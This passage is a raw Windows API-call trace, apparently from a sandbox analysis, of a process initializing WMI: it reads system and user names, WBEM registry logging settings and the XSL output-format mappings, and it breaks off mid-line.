GetSystemDirectoryW (in: lpBuffer=0x2866d0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0094.834] free (_Block=0x2866d0) [0094.834] malloc (_Size=0x18) returned 0x2866d0 [0094.835] malloc (_Size=0x18) returned 0x2866f0 [0094.835] malloc (_Size=0x18) returned 0x286710 [0094.835] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0094.835] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0094.835] free (_Block=0x2866d0) [0094.835] free (_Block=0x2866f0) [0094.835] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0094.835] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0094.835] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0094.835] FreeLibrary (hLibModule=0x77940000) returned 1 [0094.836] free (_Block=0x286710) [0094.836] _vsnwprintf (in: _Buffer=0x287f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1cf868 | out: _Buffer="ms_409") returned 6 [0094.836] malloc (_Size=0x20) returned 0x2866d0 [0094.836] GetComputerNameW (in: lpBuffer=0x2866d0, nSize=0x1cfc40 | out: lpBuffer="XDUWTFONO", nSize=0x1cfc40) returned 1 [0094.836] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.836] malloc (_Size=0x14) returned 0x286700 [0094.836] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.836] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1cfc38 | out: lpNameBuffer=0x0, nSize=0x1cfc38) returned 0x7fffffdd000 [0094.838] GetLastError () returned 0xea [0094.838] malloc (_Size=0x40) returned 0x286720 [0094.838] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x286720, nSize=0x1cfc38 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cfc38) returned 0x1 [0094.839] lstrlenW (lpString="") returned 0 [0094.839] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.839] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0094.841] lstrlenW (lpString=".") returned 1 [0094.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.841] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0094.841] lstrlenW (lpString="LOCALHOST") returned 9 [0094.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.841] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0094.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.841] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0094.841] free (_Block=0x286700) [0094.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.841] malloc (_Size=0x14) returned 0x286700 [0094.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.841] malloc (_Size=0x14) returned 0x286770 [0094.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.842] malloc (_Size=0x8) returned 0x286790 [0094.842] malloc (_Size=0x18) returned 0x2867b0 [0094.842] malloc (_Size=0x30) returned 0x2867d0 [0094.842] malloc (_Size=0x18) returned 0x286810 [0094.842] SysStringLen (param_1="IDENTIFY") returned 0x8 [0094.842] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0094.842] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0094.842] SysStringLen (param_1="IDENTIFY") returned 0x8 [0094.842] malloc (_Size=0x30) returned 0x286830 [0094.842] malloc (_Size=0x18) returned 0x286870 [0094.842] SysStringLen (param_1="IMPERSONATE") returned 0xb [0094.842] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0094.842] SysStringLen (param_1="IMPERSONATE") returned 0xb [0094.842] SysStringLen (param_1="IDENTIFY") returned 0x8 [0094.842] SysStringLen (param_1="IDENTIFY") returned 0x8 [0094.842] SysStringLen (param_1="IMPERSONATE") returned 0xb [0094.842] malloc (_Size=0x30) returned 0x286890 [0094.842] malloc (_Size=0x18) returned 0x2868d0 [0094.842] SysStringLen (param_1="DELEGATE") returned 0x8 [0094.842] SysStringLen (param_1="IDENTIFY") returned 0x8 [0094.842] SysStringLen (param_1="DELEGATE") returned 0x8 [0094.842] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0094.842] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0094.842] SysStringLen (param_1="DELEGATE") returned 0x8 [0094.842] malloc (_Size=0x30) returned 0x2868f0 [0094.842] malloc (_Size=0x18) returned 0x286930 [0094.842] malloc (_Size=0x30) returned 0x286950 [0094.842] malloc (_Size=0x18) returned 0x286990 [0094.842] SysStringLen (param_1="NONE") returned 0x4 [0094.843] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.843] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.843] SysStringLen (param_1="NONE") returned 0x4 [0094.843] malloc (_Size=0x30) returned 0x2869b0 [0094.843] malloc (_Size=0x18) returned 0x2869f0 [0094.843] SysStringLen (param_1="CONNECT") returned 0x7 [0094.843] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.843] malloc (_Size=0x30) returned 0x286a10 [0094.843] malloc (_Size=0x18) returned 0x286a50 [0094.843] SysStringLen (param_1="CALL") returned 0x4 [0094.843] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.843] SysStringLen (param_1="CALL") returned 0x4 [0094.843] SysStringLen (param_1="CONNECT") returned 0x7 [0094.843] malloc (_Size=0x30) returned 0x286a70 [0094.843] malloc (_Size=0x18) returned 0x286ab0 [0094.843] SysStringLen (param_1="PKT") returned 0x3 [0094.843] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.843] SysStringLen (param_1="PKT") returned 0x3 [0094.843] SysStringLen (param_1="NONE") returned 0x4 [0094.843] SysStringLen (param_1="NONE") returned 0x4 [0094.843] SysStringLen (param_1="PKT") returned 0x3 [0094.843] malloc (_Size=0x30) returned 0x286ad0 [0094.843] malloc (_Size=0x18) returned 0x286b10 [0094.843] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0094.843] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.843] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0094.843] SysStringLen (param_1="NONE") returned 0x4 [0094.843] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0094.843] SysStringLen (param_1="PKT") returned 0x3 [0094.843] SysStringLen (param_1="PKT") returned 0x3 [0094.843] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0094.843] malloc (_Size=0x30) returned 0x288000 [0094.844] malloc (_Size=0x18) returned 0x286f30 [0094.844] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0094.844] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.844] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0094.844] SysStringLen (param_1="PKT") returned 0x3 [0094.844] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0094.844] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0094.844] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0094.844] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0094.844] malloc (_Size=0x30) returned 0x288040 [0094.844] malloc (_Size=0x40) returned 0x286f50 [0094.844] malloc (_Size=0x20a) returned 0x288fd0 [0094.844] GetSystemDirectoryW (in: lpBuffer=0x288fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0094.844] free (_Block=0x288fd0) [0094.844] malloc (_Size=0x18) returned 0x286fa0 [0094.844] malloc (_Size=0x18) returned 0x288fd0 [0094.845] malloc (_Size=0x18) returned 0x288ff0 [0094.845] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0094.845] SysStringLen (param_1="\\wbem\\") returned 0x6 [0094.845] free (_Block=0x286fa0) [0094.845] free (_Block=0x288fd0) [0094.845] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0094.845] free (_Block=0x288ff0) [0094.845] malloc (_Size=0x18) returned 0x286fa0 [0094.845] malloc (_Size=0x18) returned 0x288fd0 [0094.845] malloc (_Size=0x18) returned 0x288ff0 [0094.845] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0094.845] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0094.845] free (_Block=0x286fa0) [0094.845] free (_Block=0x288fd0) [0094.845] GetCurrentThreadId () returned 0xb10 [0094.846] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1cf540 | out: phkResult=0x1cf540*=0xf8) returned 0x0 [0094.846] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1cf590, lpcbData=0x1cf530*=0x400 | out: lpType=0x0, lpData=0x1cf590*=0x30, lpcbData=0x1cf530*=0x4) returned 0x0 [0094.846] _wcsicmp (_String1="0", _String2="1") returned -1 [0094.846] _wcsicmp (_String1="0", _String2="2") returned -2 [0094.846] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1cf530*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1cf530*=0x42) returned 0x0 [0094.846] malloc (_Size=0x86) returned 0x289010 [0094.846] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x289010, lpcbData=0x1cf530*=0x42 | out: lpType=0x0, lpData=0x289010*=0x25, lpcbData=0x1cf530*=0x42) returned 0x0 [0094.846] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0094.846] malloc (_Size=0x42) returned 0x2890a0 [0094.846] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0094.846] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1cf590, lpcbData=0x1cf530*=0x400 | out: lpType=0x0, lpData=0x1cf590*=0x36, lpcbData=0x1cf530*=0xc) returned 0x0 [0094.846] _wtol (_String="65536") returned 65536 [0094.846] free (_Block=0x289010) [0094.846] RegCloseKey (hKey=0x0) returned 0x6 [0094.846] CoCreateInstance (in: rclsid=0xff167410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff1673f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1cfa38 | out: ppv=0x1cfa38*=0x21671d0) returned 0x0 [0095.181] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x21671d0, xmlSource=0x1cfb80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x286fa0), isSuccessful=0x1cfbf0 | out: isSuccessful=0x1cfbf0*=0xffff) returned 0x0 [0098.258] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21671d0, DOMElement=0x1cfa30 | out: DOMElement=0x1cfa30*=0x216bc50) returned 0x0 [0098.259] malloc (_Size=0x18) returned 0x28b810 [0098.259] IXMLDOMElement:getElementsByTagName (in: This=0x216bc50, tagName="XSLFORMAT", resultList=0x1cfa40 | out: resultList=0x1cfa40*=0x2169cc0) returned 0x0 [0098.261] free (_Block=0x28b810) [0098.261] IXMLDOMNodeList:get_length (in: This=0x2169cc0, listLength=0x1cfc08 | out: listLength=0x1cfc08*=21) returned 0x0 [0098.262] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=0, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.262] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="texttable.xsl") returned 0x0 [0098.262] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.262] malloc (_Size=0x18) returned 0x28b810 [0098.262] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.263] free (_Block=0x28b810) [0098.263] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x2)) returned 0x0 [0098.263] malloc (_Size=0x18) returned 0x28b810 [0098.263] malloc (_Size=0x18) returned 0x28b830 [0098.263] malloc (_Size=0x30) returned 0x288080 [0098.263] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.263] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.263] IUnknown:Release (This=0x216a280) returned 0x0 [0098.263] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=1, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.263] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="textvaluelist.xsl") returned 0x0 [0098.263] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.263] malloc (_Size=0x18) returned 0x28b850 [0098.264] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.264] free (_Block=0x28b850) [0098.264] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x2)) returned 0x0 [0098.264] malloc (_Size=0x18) returned 0x28b850 [0098.264] malloc (_Size=0x18) returned 0x28b870 [0098.264] SysStringLen (param_1="VALUE") returned 0x5 [0098.264] SysStringLen (param_1="TABLE") returned 0x5 [0098.264] SysStringLen (param_1="TABLE") returned 0x5 [0098.264] SysStringLen (param_1="VALUE") returned 0x5 [0098.264] malloc (_Size=0x30) returned 0x2880c0 [0098.264] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.264] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.264] IUnknown:Release (This=0x216a280) returned 0x0 [0098.264] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=2, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.264] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="textvaluelist.xsl") returned 0x0 [0098.264] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.264] malloc (_Size=0x18) returned 0x28b890 [0098.264] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.265] free (_Block=0x28b890) [0098.265] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x2)) returned 0x0 [0098.265] malloc (_Size=0x18) returned 0x28b890 [0098.265] malloc (_Size=0x18) returned 0x28b8b0 [0098.265] SysStringLen (param_1="LIST") returned 0x4 [0098.265] SysStringLen (param_1="TABLE") returned 0x5 [0098.265] malloc (_Size=0x30) returned 0x288100 [0098.265] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.265] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.265] IUnknown:Release (This=0x216a280) returned 0x0 [0098.265] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=3, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.265] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="rawxml.xsl") returned 0x0 [0098.265] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.265] malloc (_Size=0x18) returned 0x28b8d0 [0098.265] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.266] free (_Block=0x28b8d0) [0098.266] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x2)) returned 0x0 [0098.266] malloc (_Size=0x18) returned 0x28b8d0 [0098.266] malloc (_Size=0x18) returned 0x28b8f0 [0098.266] SysStringLen (param_1="RAWXML") returned 0x6 [0098.266] SysStringLen (param_1="TABLE") returned 0x5 [0098.266] SysStringLen (param_1="RAWXML") returned 0x6 [0098.266] SysStringLen (param_1="LIST") returned 0x4 [0098.266] SysStringLen (param_1="LIST") returned 0x4 [0098.266] SysStringLen (param_1="RAWXML") returned 0x6 [0098.266] malloc (_Size=0x30) returned 0x288140 [0098.266] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.266] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.266] IUnknown:Release (This=0x216a280) returned 0x0 [0098.266] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=4, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.266] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="htable.xsl") returned 0x0 [0098.266] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.266] malloc (_Size=0x18) returned 0x28b910 [0098.267] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.267] free (_Block=0x28b910) [0098.267] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x2)) returned 0x0 [0098.267] malloc (_Size=0x18) returned 0x28b910 [0098.267] malloc (_Size=0x18) returned 0x28b930 [0098.267] SysStringLen (param_1="HTABLE") returned 0x6 [0098.267] SysStringLen (param_1="TABLE") returned 0x5 [0098.267] SysStringLen (param_1="HTABLE") returned 0x6 [0098.267] SysStringLen (param_1="LIST") returned 0x4 [0098.267] malloc (_Size=0x30) returned 0x288180 [0098.267] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.267] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.267] IUnknown:Release (This=0x216a280) returned 0x0 [0098.267] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=5, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.267] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="hform.xsl") returned 0x0 [0098.267] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.267] malloc (_Size=0x18) returned 0x28b950 [0098.267] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.268] free (_Block=0x28b950) [0098.268] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x2)) returned 0x0 [0098.268] malloc (_Size=0x18) returned 0x28b950 [0098.268] malloc (_Size=0x18) returned 0x28b970 [0098.268] SysStringLen (param_1="HFORM") returned 0x5 [0098.268] SysStringLen (param_1="TABLE") returned 0x5 [0098.268] SysStringLen (param_1="HFORM") returned 0x5 [0098.268] SysStringLen (param_1="LIST") returned 0x4 [0098.268] SysStringLen (param_1="HFORM") returned 0x5 [0098.268] SysStringLen (param_1="HTABLE") returned 0x6 [0098.268] malloc (_Size=0x30) returned 0x2881c0 [0098.268] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.268] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.268] IUnknown:Release (This=0x216a280) returned 0x0 [0098.268] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=6, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.268] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="xml.xsl") returned 0x0 [0098.268] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.268] malloc (_Size=0x18) returned 0x28b990 [0098.269] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.269] free (_Block=0x28b990) [0098.269] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x2)) returned 0x0 [0098.269] malloc (_Size=0x18) returned 0x28b990 [0098.269] malloc (_Size=0x18) returned 0x28b9b0 [0098.269] SysStringLen (param_1="XML") returned 0x3 [0098.269] SysStringLen (param_1="TABLE") returned 0x5 [0098.269] SysStringLen (param_1="XML") returned 0x3 [0098.269] SysStringLen (param_1="VALUE") returned 0x5 [0098.269] SysStringLen (param_1="VALUE") returned 0x5 [0098.269] SysStringLen (param_1="XML") returned 0x3 [0098.269] malloc (_Size=0x30) returned 0x288200 [0098.269] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.269] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.269] IUnknown:Release (This=0x216a280) returned 0x0 [0098.269] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=7, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.269] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="mof.xsl") returned 0x0 [0098.269] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.270] malloc (_Size=0x18) returned 0x28b9d0 [0098.270] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.270] free (_Block=0x28b9d0) [0098.270] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x2)) returned 0x0 [0098.270] malloc (_Size=0x18) returned 0x28b9d0 [0098.270] malloc (_Size=0x18) returned 0x28b9f0 [0098.270] SysStringLen (param_1="MOF") returned 0x3 [0098.270] SysStringLen (param_1="TABLE") returned 0x5 [0098.270] SysStringLen (param_1="MOF") returned 0x3 [0098.270] SysStringLen (param_1="LIST") returned 0x4 [0098.270] SysStringLen (param_1="MOF") returned 0x3 [0098.270] SysStringLen (param_1="RAWXML") returned 0x6 [0098.270] SysStringLen (param_1="LIST") returned 0x4 [0098.270] SysStringLen (param_1="MOF") returned 0x3 [0098.270] malloc (_Size=0x30) returned 0x288240 [0098.270] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.270] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.270] IUnknown:Release (This=0x216a280) returned 0x0 [0098.270] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=8, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.271] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="csv.xsl") returned 0x0 [0098.271] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.271] malloc (_Size=0x18) returned 0x28ba10 [0098.271] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.271] free (_Block=0x28ba10) [0098.271] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x2)) returned 0x0 [0098.271] malloc (_Size=0x18) returned 0x28ba10 [0098.271] malloc (_Size=0x18) returned 0x28ba30 [0098.271] SysStringLen (param_1="CSV") returned 0x3 [0098.271] SysStringLen (param_1="TABLE") returned 0x5 [0098.271] SysStringLen (param_1="CSV") returned 0x3 [0098.271] SysStringLen (param_1="LIST") returned 0x4 [0098.271] SysStringLen (param_1="CSV") returned 0x3 [0098.271] SysStringLen (param_1="HTABLE") returned 0x6 [0098.271] SysStringLen (param_1="CSV") returned 0x3 [0098.271] SysStringLen (param_1="HFORM") returned 0x5 [0098.271] malloc (_Size=0x30) returned 0x288280 [0098.272] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.272] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.272] IUnknown:Release (This=0x216a280) returned 0x0 [0098.272] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=9, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.272] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="texttable.xsl") returned 0x0 [0098.272] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.272] malloc (_Size=0x18) returned 0x28ba50 [0098.272] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.272] free (_Block=0x28ba50) [0098.272] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x2)) returned 0x0 [0098.272] malloc (_Size=0x18) returned 0x28ba50 [0098.272] malloc (_Size=0x18) returned 0x28ba70 [0098.272] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.273] SysStringLen (param_1="TABLE") returned 0x5 [0098.273] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.273] SysStringLen (param_1="VALUE") returned 0x5 [0098.273] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.273] SysStringLen (param_1="XML") returned 0x3 [0098.273] SysStringLen (param_1="XML") returned 0x3 [0098.273] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.273] malloc (_Size=0x30) returned 0x2882c0 [0098.273] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.273] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.273] IUnknown:Release (This=0x216a280) returned 0x0 [0098.273] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=10, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.273] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="texttable.xsl") returned 0x0 [0098.273] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.273] malloc (_Size=0x18) returned 0x28ba90 [0098.273] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.274] free (_Block=0x28ba90) [0098.274] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x2)) returned 0x0 [0098.274] malloc (_Size=0x18) returned 0x28ba90 [0098.274] malloc (_Size=0x18) returned 0x28bab0 [0098.274] SysStringLen (param_1="texttablewsys") returned 0xd [0098.274] SysStringLen (param_1="TABLE") returned 0x5 [0098.274] SysStringLen 